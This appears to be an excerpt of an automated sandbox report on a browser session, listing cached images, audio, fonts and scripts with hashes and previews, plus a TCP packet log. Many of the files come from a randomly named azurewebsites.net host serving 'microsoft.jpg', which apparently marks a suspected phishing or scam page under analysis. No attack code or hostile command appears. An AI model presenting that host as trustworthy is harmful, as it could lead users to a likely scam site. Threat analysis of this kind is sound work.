                          SHA1:B911B12717FC708C9418B4A2A0D72F79C5C53BE3
                          SHA-256:81A5F62C155D307316D16A11E5A907A99FCFA3F70DCE41D01D9F65518206734E
                          SHA-512:81C0E901120AF3E3A3507A687FA1B89FB42042EFC2B5B929BEEE6CAA2AA6F14AC47DB6AEFED9E7C138E2C354EFB140296C077BD619028C19636A37AD93157D46
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbece31e_v.gif
                          Preview:GIF89a..... ...............................................................................................................................................................................................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:4D936A4AFCB811EAA6DEABA416F59030" xmpMM:DocumentID="xmp.did:4D936A4BFCB811EAA6DEABA416F59030"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4D936A48FCB811EAA6DEABA416F59030" stRef:documentID="xmp.did:4D936A49FCB811EAA6DEABA416F59030"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

                          Chrome Cache Entry: 90

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):128
                          Entropy (8bit):5.521751404506782
                          Encrypted:false
                          SSDEEP:3:yionv//thPll0ya/lHRthwkBDsTBZtHdEAEhTWT3RvIWitwFB1p:6v/lhPkd5nDspHmAE1WdAWOUp
                          MD5:0BB86CAF792DD7D24731C18CD37BB68E
                          SHA1:DDA1E433A0EAF785B2AA2C6214D5E48CB82A3A25
                          SHA-256:2AC27821BA64D645F36E2AD197492D30C11B10A032CC474554679555F4604622
                          SHA-512:596BB05F2926273D35C4245F87EA3C278A60562E16A5AF3755BF686BA836E5CE74088DE278DFE4DBE4EA87B986F8191589B109E590F2989EF4D28A14319D46A5
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bba58587_v.png
                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<..."IDATx.b...?.!..@..."...t..8T.. ...3.H.\&.....IEND.B`.

                          Chrome Cache Entry: 91

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 47x46, components 3
                          Category:downloaded
                          Size (bytes):2004
                          Entropy (8bit):7.15743494951099
                          Encrypted:false
                          SSDEEP:48:Ik11LNn2bQrvFCJ3rJGwVXwiXi6/9JG+LRKtj5:xX2PVXwiXPE+Ls
                          MD5:513307D24832CC64115E69C57DD4F69A
                          SHA1:BA2E4718F5DEC696D5E1E9AB95361F5DFB337F23
                          SHA-256:F70249B342AECD9E3D2367AEA39DF606E92562F9D7945AD8849B36CD3E3A85A1
                          SHA-512:8CD7A72524AC7F3FF510ABC55011DD47D22B79AA008165F5FC96C48142E401F2A099AB1D83C9767B2B7FD4F85638C202DF4D1A247D71368C718482C9A2BAAE7E
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/microsoft.jpg
                          Preview:......Exif..II*.................Ducky.......d.....,http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:1E4EEBFEFC2911EA8925B92872E41A09" xmpMM:DocumentID="xmp.did:1E4EEBFFFC2911EA8925B92872E41A09"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E4EEBFCFC2911EA8925B92872E41A09" stRef:documentID="xmp.did:1E4EEBFDFC2911EA8925B92872E41A09"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................

                          Chrome Cache Entry: 92

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 120 x 97
                          Category:dropped
                          Size (bytes):1776
                          Entropy (8bit):7.410616971205723
                          Encrypted:false
                          SSDEEP:48:Sb11LNn2bQlE/J3Tv1L82sAfy6e7+vnwRO674EyLY:wX2HnU6eun7674EyE
                          MD5:8806694DB55D271B6C836433D103AFCD
                          SHA1:A532AE846499FFA93BD6ED8BAAFCBDABB2CC8DA1
                          SHA-256:989F955C24583BE00DEFAB08C4CF80B17FE4C12756686359367144F0506EB8B8
                          SHA-512:A46D75C51701F7FA6BD1BAC01E6FCD5C0EFCE9043D401146004A7E97D96E379CD3D64250D46CB8300648A3467483319EED4C11EE9BBD5E5AF441C09688F4B56E
                          Malicious:false
                          Reputation:low
                          Preview:GIF89ax.a......-.'...8.1......k.g...F.@.....&. ...^.Y....L.G;.5*.#...W.Q......|..v.q#.................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:3C513C34041C11EB8023E7F90A16D798" xmpMM:DocumentID="xmp.did:3C513C35041C11EB8023E7F90A16D798"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3C513C32041C11EB8023E7F90A16D798" stRef:documentID="xmp.did:3C513C33041C11EB8023E7F90A16D798"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>................................................................................................

                          Chrome Cache Entry: 93

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):13434
                          Entropy (8bit):5.3621564687615715
                          Encrypted:false
                          SSDEEP:192:x37ao37bi5Koi5cl5yol50kRokZP5BoP5B25ho25hp5Yop5SI5MoI5OT5woT5b7I:x333vK1XQ300rz81yi9LhX8
                          MD5:958F1648D2413AA161BA92E573B267BE
                          SHA1:18F1CAF193F19D1BE5767F514820669EF89AA9E0
                          SHA-256:1B5055F0E4F12757F77CB6A296D6DCF95A02784C987731892DCFA730D12DD0F3
                          SHA-512:896B2F66819409C8AD94FD767A2E8F6C1C99FA20C9D539C681069BF57F65232C9DDBFE64004D5C23928F397780BBD62C5885D253A98EB79AAFA4D3D553343F0F
                          Malicious:false
                          Reputation:low
                          URL:"https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap"
                          Preview:/* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiAyp8kv8JHgFVrJJLmE0tMMPKzSQ.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiAyp8kv8JHgFVrJJLmE0tCMPI.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 200;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiDyp8kv8JHgFVrJJLmv1pVGdeOcEg.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+

                          Chrome Cache Entry: 94

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):1192
                          Entropy (8bit):6.581451718666899
                          Encrypted:false
                          SSDEEP:24:+Q1h6A1aWwjx82lY2T3PQVWNkyJ3VZDq6GC9yoUWGaUb0I:+u11LNn2bQ4pJ3PPCWG9bT
                          MD5:E526E4FF50594A6C4A5D05C18474D6E7
                          SHA1:705609A2BD21C1E3E13666451C75D2C51436C83E
                          SHA-256:D25CF2403704D5208D662AF4EF703D424CEDEAC253A43A1AEC6E60E0DB43837F
                          SHA-512:D75DBDAD41CA7FB223CF910AF6D49C086C7BA574572FD43DF37AA4A9A98952861575FA6F53E5A25FF15990B0EE51D8FF4A5A1C95BD87CA9B49BA4CEFCC96791E
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/cut.png
                          Preview:.PNG........IHDR.............Vu\.....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:EED7F621FD9111EA981C95305B8F3A6E" xmpMM:DocumentID="xmp.did:EED7F622FD9111EA981C95305B8F3A6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EED7F61FFD9111EA981C95305B8F3A6E" stRef:documentID="xmp.did:EED7F620FD9111EA981C95305B8F3A6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b8{........o.....#.6......e655}...C~ g...N777.o.$...+.I.&}....1&&......IFFF....y.$.R...$.R.R....../_^r..

                          Chrome Cache Entry: 95

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (5945)
                          Category:downloaded
                          Size (bytes):309144
                          Entropy (8bit):5.56714754913458
                          Encrypted:false
                          SSDEEP:3072:EW44gMc0Iard8OdwDMQba8DqCKqjysCBIQ+9agdDBqzGmRmFHxKb+WH54OQoD5AN:344b8OdwDMw9z1zQ+9fdDBqzGamW+Os
                          MD5:F4D0CA5CA066E5A1163D56E75D21C77F
                          SHA1:EDCA80EA7A488C4E3A84C2D91F7D4BAC9BA12A34
                          SHA-256:36F0337D5ED271064828C200C30345B9FBFCA539473D9A4BC0ACF1C8271F0D8E
                          SHA-512:C60280C37C6CB6E646C62C399A47A9629ED10F8027221C357E1C45F3EB0C4620C40A344D5A17C5DC372CB65AC864C261EDBCBF29173317F9BFBA87094BED606B
                          Malicious:false
                          Reputation:low
                          URL:https://www.googletagmanager.com/gtag/js?id=G-WGPCQTD2D9
                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email

                          Chrome Cache Entry: 96

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 13 x 13, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):349
                          Entropy (8bit):7.047569859646336
                          Encrypted:false
                          SSDEEP:6:6v/lhPfnY+7nDsphbAX6jNYCIh61Uw49/J3BYwmPYYSU+59AyROJwWgZPOIwCMR9:6v/74+U3AANXIsUDdI3+XtRZPONCMROO
                          MD5:7454C652E0733D92DE6C920C2D646AE0
                          SHA1:34A5BD8C7401F95E346895B0E5CCFFBF0E9AD638
                          SHA-256:44F752B0BD2E48052D538BC6ACA5379F3630CA64DA945F794690DDF47E8EAEF7
                          SHA-512:DDE6D40BEC105003CB93C52DD3322C26985FECC7FF1EAB79547FB7F0365AB2FB7B1CBA96AED81958C08627FC6C0BA6034BCEC53B1B66705D7B04202E7F8B5B59
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbae3ed9_v.png
                          Preview:.PNG........IHDR...............s+....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.Q1.E@.e..jQ..3hTJ.J......$J..h)$B).t$._.&....).x....y.w...uu]7.......8..(.e.3MS.e.H.0.#."....Q...QU5.C.@.<...$.Bx..x.8.m.n..'r .}.....x.8..i.q.-........0..9O.A...............a.O..{.W..<......1V..0.O.....I..`.!L.....i....6.B#....~....p..Nq.....IEND.B`.

                          Chrome Cache Entry: 97

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 24 x 9
                          Category:dropped
                          Size (bytes):102
                          Entropy (8bit):5.604040192344847
                          Encrypted:false
                          SSDEEP:3:CH38qQ/c1/loLHCgKydbGwPMen:08qQ/ciHc+CwUe
                          MD5:EF14D57C065FDBD3C66D017A729CA91F
                          SHA1:2E7B72D674361A9C2B41767CCFBED2486E6695DD
                          SHA-256:6FCBFCDA8A36536A0F9B0BC8C4A6CA451D9BAFD4A879D56697E48E209691BA36
                          SHA-512:671931AEE6F21E9E49B2BB09782E4CD20696472B29E584FDF2F7C32179CB177F9683A05F41BA6DA81A09F0FA09800D2D1267412DACD2C70695A3A501EE28608D
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a.......#.......I.Cv.q-.'......!.......,..........+..\".........1.f...h.....Z...8.t.*n..3.p...;

                          Chrome Cache Entry: 98

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Audio file with ID3 version 2.4.0, contains:\012- MPEG ADTS, layer III, v2, 48 kbps, 24 kHz, Monaural
                          Category:downloaded
                          Size (bytes):101853
                          Entropy (8bit):7.643498965787984
                          Encrypted:false
                          SSDEEP:1536:DT1iSE1S5Lg1K4g11rFFp0rB8e9lHNepm2OnhBoixRd5jtq7NYpP5fi:DT1if8Lg1K4gHp4VckhB52Rcfi
                          MD5:055A557678E9306B25533420C5874F93
                          SHA1:1BBC540406F6EB5393523953827506EC8009F838
                          SHA-256:6DE60598AF9DA956A414B46232C8550948AECFD605165A59F16FD18D378BAA4E
                          SHA-512:FCEF92A613C71CF2267EBCABB04B5F97F956F37866723A5AD1C861D830B2D1FEACC206D618B5917A098936ED781A00C97E6B59FEF0EF5D6BC770BE7AB033F3AA
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/a0ler0tm0s.mp3:2f77d16bffe6e7:0
                          Preview:ID3......#TSSE.......Lavf58.76.100.............d...I...C@..J...-..h...%.......^......{....?ww..w}.J......4M...<.8..x...N..........|......>.p|..............x>...@ ....\E.....T.$E-.....E.d....d..#.J........ ..8..o..</.`w.$.......j`.a.....D!.y].@.0*...7.r.3D..@[.9#.F...r*)......G./....L.>.&.....2...vL.,..........ED.U9...DyFnS.l....d........@."\O....<.S..RD.<.A8@h."...).*..>.w..QX.9:l.&.My......A.#....e"..I.c.`|.2.Q.l.\.$&...S5}..Ap.3'..8>1.e.U.K.m.G...6....;f/.W.....d.."...Ny.. .u...w.T........U.i....{...\..<.9T.z..Um.*.+...Q.R^..?..F...JM...=..3.3.{..#...dq..x..4.H.r7..G..(......4L]U...S.. .....2.qJ...d...[..y..=..S...ULW4$+`.o..W.i.X.Z..[R..Uc.)M...3.cJ.)Q..1..7..v.?.Cs;}...yS.T...M4....^".u.p..(.dU.w.^.......5=)pb.y.....1..-J..q..({...d.*.....X@.XB"..62..8..2Y.+.,.<37..M_...A........4.....;%M[.O<W...4......D.(y.U.I..k....Vx.vSPB*./.Q.I..A8.*.2Ap%E..*Uj.3R)i,v:.c.{......d.:(..a..x.b......\...i..!6N.^7...l...,8F0.su.m.KB...3...r..J.3...<..7..../..K.e.'.

                          Chrome Cache Entry: 99

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 7748, version 1.0
                          Category:downloaded
                          Size (bytes):7748
                          Entropy (8bit):7.975193180895361
                          Encrypted:false
                          SSDEEP:96:0g6vAF/FXh6MmoI56TEwosGU/DbVF/QBT1gaHEYT6u/w3hXLbJPAS772+6haAftj:zp6x6TYpoDYBJg8TRkbJPAS/2+CzQa7
                          MD5:A09F2FCCFEE35B7247B08A1A266F0328
                          SHA1:0DA2D17E738F46D2A09E6FB7969DA451719A9820
                          SHA-256:CD36DE204ACA2D5FA263A731F7C20009B5E3D754BA1F1E03C33E93A48F3E7446
                          SHA-512:5E3F9A298003B84250EC6801E08AD2A4FF8845D4C3E13EA61BEC37DA24D26EDE13B436257882124CC0C27E9A323BA92E7D23C6AD3F48A7B75535F5ED98813A0E
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2
                          Preview:wOF2.......D......?p.................................`..T..0....6..6.$..h. ..H....82EF.....E...........W...b.....b..l...Qc/.....G4.]Rc..C...9J....>W..A.#..~.$.-.....}.......$-.........B1..;<....=.FO... R..%......9.E.s..M6.k.-_.^.?...._...lI..59Y.f|..&..J..<8....e.zip".......q...u.?Y.....I.:MA.d.Y....0>..E.....a...H...:.....A.j.h.P.......A.+.l/j........d....r)Y>..V..@E\Q.k.E..(....6..yf.)s..O..z..........`Q.La'N.t V$.. t".ZDb......U.A.........p~.TW.K....y..^.(.;....K.TO.l... {s..M$ ....!....a..^.y...._...H..e.lKD.#..9.$...!&.19.9I..R-..b...TD&...j...xol.[...~.!.q.%..M..>...k.K.{5......+..U....34........[R.GZF.s}&...#g.P..Y..zF..-&..Y.i.3...I_3..Q.....`i....F{.z..>0....N...16.i.@.........5D3..>.._o.0M+5qI.ds..o...1v.!zx..T..b.w.:.....z$...s..x...v...e.&.[.qb.P..Gt....D.3.. ..W.^f.C(...t..`.|..0.Z.C|..)...0....Y.Q...m.k...-VmS..6p..%7.o(0p..4..S7..i\.....v.k.+S)J....+..../....xv.9.W..nR.CG..f..|....Y...'W.....|b<.wN@....-[....l.P4#..=...[

                          Static File Info

                          No static file info

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 25, 2024 01:00:21.469671965 CEST49674443192.168.2.6173.222.162.64
                          May 25, 2024 01:00:21.469671965 CEST49673443192.168.2.6173.222.162.64
                          May 25, 2024 01:00:21.797854900 CEST49672443192.168.2.6173.222.162.64
                          May 25, 2024 01:00:29.755115986 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:29.755173922 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:29.755250931 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:29.755589008 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:29.755619049 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:30.447438002 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:30.447464943 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:30.447516918 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:30.448714972 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:30.448771954 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:30.448838949 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:30.449489117 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:30.449510098 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:30.449570894 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:30.451744080 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:30.451759100 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:30.458590031 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:30.458623886 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:30.459147930 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:30.459172964 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:30.469924927 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:30.469944000 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:30.470002890 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:30.470662117 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:30.470676899 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:30.544466972 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:30.544876099 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:30.544913054 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:30.546622038 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:30.546689987 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:30.551738977 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:30.551836014 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:30.597803116 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:30.597836971 CEST44349707172.217.18.4192.168.2.6
                          May 25, 2024 01:00:30.639905930 CEST49707443192.168.2.6172.217.18.4
                          May 25, 2024 01:00:31.077090979 CEST49674443192.168.2.6173.222.162.64
                          May 25, 2024 01:00:31.077090979 CEST49673443192.168.2.6173.222.162.64
                          May 25, 2024 01:00:31.166929960 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.167416096 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.167433023 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.169172049 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.169241905 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.169787884 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.170453072 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.170522928 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.172018051 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.172102928 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.179857969 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.193295002 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:31.194761038 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.195020914 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.195072889 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.195113897 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.196084976 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.196098089 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:31.196108103 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:31.196150064 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.196433067 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.196558952 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.197067022 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.197133064 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.197165012 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:31.197221041 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:31.197366953 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.197376966 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.198139906 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.198167086 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.198276997 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.198291063 CEST44349715104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.198512077 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:31.198568106 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:31.198870897 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:31.198875904 CEST44349716104.17.24.14192.168.2.6
                          May 25, 2024 01:00:31.238604069 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.238619089 CEST49715443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.249392033 CEST49716443192.168.2.6104.17.24.14
                          May 25, 2024 01:00:31.249399900 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.308594942 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.314234018 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.314281940 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.314296961 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.320080042 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.320139885 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.320144892 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.322974920 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.323024988 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.323029995 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.331594944 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.331640959 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.331645966 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.338007927 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.338057041 CEST49713443192.168.2.6104.18.11.207
                          May 25, 2024 01:00:31.338064909 CEST44349713104.18.11.207192.168.2.6
                          May 25, 2024 01:00:31.343010902 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.343075037 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.343136072 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.343188047 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.348294973 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.348354101 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.348373890 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.357739925 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.357783079 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.357815027 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.357839108 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.357891083 CEST49714443192.168.2.6104.18.10.207
                          May 25, 2024 01:00:31.362432003 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.362523079 CEST44349714104.18.10.207192.168.2.6
                          May 25, 2024 01:00:31.362566948 CEST49714443192.168.2.6104.18.10.207
